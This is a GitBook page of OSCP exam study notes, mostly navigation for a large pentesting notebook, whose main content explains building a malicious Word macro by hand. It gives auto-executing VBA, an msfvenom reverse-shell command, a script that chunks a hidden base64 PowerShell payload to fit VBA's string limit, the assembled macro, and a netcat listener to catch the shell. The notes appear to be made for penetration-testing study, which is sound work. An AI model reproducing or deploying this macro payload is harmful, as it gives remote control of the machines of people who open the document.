hackervegas001
  • Introduction
  • oscp notes include Active Directory 2023
    • Active Directory
      • Enumeration
        • Traditional Approach
        • Currently Logged on Users
        • Powerview
          • Bypass AMSI
          • Domain User Enum
          • Domain Group Enumeration
          • Domain Computer and Server Enum
          • GPO and OU Enum
          • Domain Shares Enum
          • ACL Enum
        • ADRecon
        • BloodHound
      • Authentication
        • Password Hash Dumping
        • Service Account Attack Kerberoasting Attack
          • using mimikatz
          • using Rubeus
          • Using Impacket
        • AS-REP Roasting
        • Password Guessing
        • SAM for windows password
        • password/hash bruteforcing
      • Lateral Movement
        • Pass the hash
        • OverPass the hash
        • Silver Ticket Attack
        • Pass the hash attack
      • Persistence
        • Golden ticket attack
        • Domain Controller synchronization-Dumping all hashes
      • Misc
        • Login method
        • nt authority\system
    • Windows Priv Esc
      • important links
      • Enumeration
      • checking tools
        • winpeas
        • Windows exploit suggester
        • Sysinternals tools
        • Powerup
      • Escalation Path
        • UAC Bypass
        • Binary hijacking / Insecure file permissions
        • Unquoted Service path
        • kernel exploit
        • Potato attack (SEimpersonation)
          • Juicypotato
          • Printspoofer
          • JuicyPotatoNG
        • DLL/EXE Hijacking
        • Service Binary hijacking
        • Exploit msi file
    • Linux Priv Esc
      • Enumeration
      • Escalation path
        • Cron case
        • Editable /etc/passwd
        • kernel exploit
        • CP SUID
        • aria2c SUID
        • systemctl SUID
    • Commands
      • cut
      • awk
      • sed
    • Tools
      • Netcat
      • Powershell
      • Powercat
      • Nmap
      • nmblookup
      • smbclient
      • enum4linux
      • Nikto
      • Certutil (wget for windows)
      • msfvenom payload for powershell
      • iwr like wget for windows
      • ldapsearch
    • Enumeration
      • DNS Enumeration
      • Port Scanning
      • SMB Enumeration
      • NFS Enumeration
      • SMTP Enumeration
      • SNMP Enumeration
    • Web Applicaton Attacks
      • File Inclusion Vuln
      • sqli
      • misc
      • directory bruteforcing
    • files transfers
      • From Windows
      • To Windows
    • Antivirus Evasion
      • Using script in powershell
      • Using Shellter Tool
      • Veil tool
    • client side attacks
      • Exploiting Microsoft Office
        • Object Linking and Embedding
        • Macro
          • Macro Manually
          • Macro using Minitrue tool
      • Code execution via Windows Library Files
    • Port and Services
      • FTP 21
      • Pop3 110
      • smb 139 445
        • smb enumeration
          • SMB Enum
        • symlink traversal
      • SMTP 25 Enumeration
      • ssh 22
      • ms-sql 1433
      • tftp, udp port 69
      • snmp 161 udp
      • VNC PORT 5801 5901
      • UnrealIRCd IRC service
      • mysql 3306
    • Password Attacks
      • Standard Wordlist
      • Bruteforce Wordlist (Crunch)
      • Network Service Attack
        • Medusa tool
        • RDP attack using Crowbar
        • Hydra
      • Password Cracking
    • Port forwarding and Tunneling
      • Chisel (http Tunneling)
      • Port Forwarding with Rinetd tool
      • ssh Tunneling
        • Local Port Forwarding
        • Remote Port Forwarding
        • Dynamic Port Forwarding
      • Plink for windows
      • Netsh for windows
      • SShuttle
    • Misc
      • Port Scanning through script
      • Tty full interactive shell
      • rdp error
      • powershell ps1 reverse shell
      • updating wordpress cred via mysql
      • wordpress
        • updating wordpress cred via mysql
      • reverse shell via ssh
    • Powershell Empire
      • Listner, Stager and agent
      • Poweshell modules
        • selection
        • Credentials and privesc
        • lateral movement
  • 🖥️Enumeration
    • 🙂:)
      • Enumeration :)
        • FTP
          • Anonymous login
            • Default FTP Client
            • Web Browser
            • Filezilla
          • Insecure ACL (RW)
          • Dictionary Attack
        • SMB
          • SMB Null/Guest Session
            • smbmap
            • smbclient
            • impacket-smbclient
            • nmap
          • Dictionary Based Attack
            • crackmapexec
            • hydra
        • SSH
        • WinRM
        • RDP
        • SMTP
        • MYsql
        • NFS
        • SNMP
    • Exploitation
      • Windows Exploitation
      • Linux Exploitation
    • Buffer Overflow
    • Active Directory
      • Active Directory All Tools And Scripts
      • Active Directory Post Enumeration
      • Active Directory Post Exploitation
    • 🏁Writeups
      • cyberSecLabs
      • Hackthebox
        • Tjnull list
          • lame
          • brainfuck
      • Pg Play | Vulnhub
      • Pg practice
      • TryHackMe
      • To Do
Powered by GitBook
On this page
  1. oscp notes include Active Directory 2023
  2. client side attacks
  3. Exploiting Microsoft Office
  4. Macro

Macro Manually

PreviousMacroNextMacro using Minitrue tool

Last updated 2 years ago

Macro manually

Microsoft Office applications like Word and Excel allow users to embed macros,

  • Create macro using , View>Macros

  • VBA code in macro to execute cmd. Here AutoOpen and Document_Open is udes to execute macro automatically when document open

<aside> ➖ Sub AutoOpen()

  MyMacro

End Sub

Sub Document_Open()

  MyMacro

End Sub

Sub MyMacro()

   CreateObject("Wscript.Shell").Run "cmd"

End Sub

</aside>

<aside> 💡 1. Remember to save in .doc (word 97-2003 document) or .docm format . it won’t work in .docx and click enable macro option when doc opens 1st time 2. remember to select current document when creating macro

</aside>

  • Now, create macro for powershell

  1. create payload and copy only “powershell.exe …………” part from it sudo msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f hta-psh OR

  2. Then put the copied payload in python script and execute it to split the commands as vba has 255 character limit

<aside> 🐍 str = "powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZQB3AC....."

n = 50

for i in range(0, len(str), n): print "Str = Str + " + '"' + str[i:i+n] + '"'

</aside>

  1. FInal vba macro code look like

<aside> ➖ Sub AutoOpen() MyMacro End Sub

Sub Document_Open() MyMacro End Sub

Sub MyMacro()

Dim Str As String
Str = "powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZ"
Str = Str + "QB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQB"
Str = Str + "TAHQAcgBlAGEAbQAoACwAWwBDAG8AbgB2AGUAcgB0AF0AOgA6A"
Str = Str + "EYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAEg"
Str = Str + "ANABzAEkAQQBBAEEAQQBBAEEAQQBFAEEATAAxAFgANgAyACsAY"
Str = Str + "gBTAEIARAAvAG4ARQBqADUASAAvAGgAZwBDAFoAQwBJAFoAUgB"
...
Str = Str + "AZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0Ac"
Str = Str + "AByAGUAcwBzACkADQAKACQAcwB0AHIAZQBhAG0AIAA9ACAATgB"
Str = Str + "lAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtA"
Str = Str + "FIAZQBhAGQAZQByACgAJABnAHoAaQBwACkADQAKAGkAZQB4ACA"
Str = Str + "AJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAVABvAEUAbgBkACgAK"
Str = Str + "QA="

CreateObject("Wscript.Shell").Run Str

End Sub

<aside> 💡 Also there are python script to create vba_macro code authomatically

</aside>

</aside>

  1. Saving the Word document, closing it, and reopening it will automatically execute the macro. And open netcat listener nc- nvlp <port>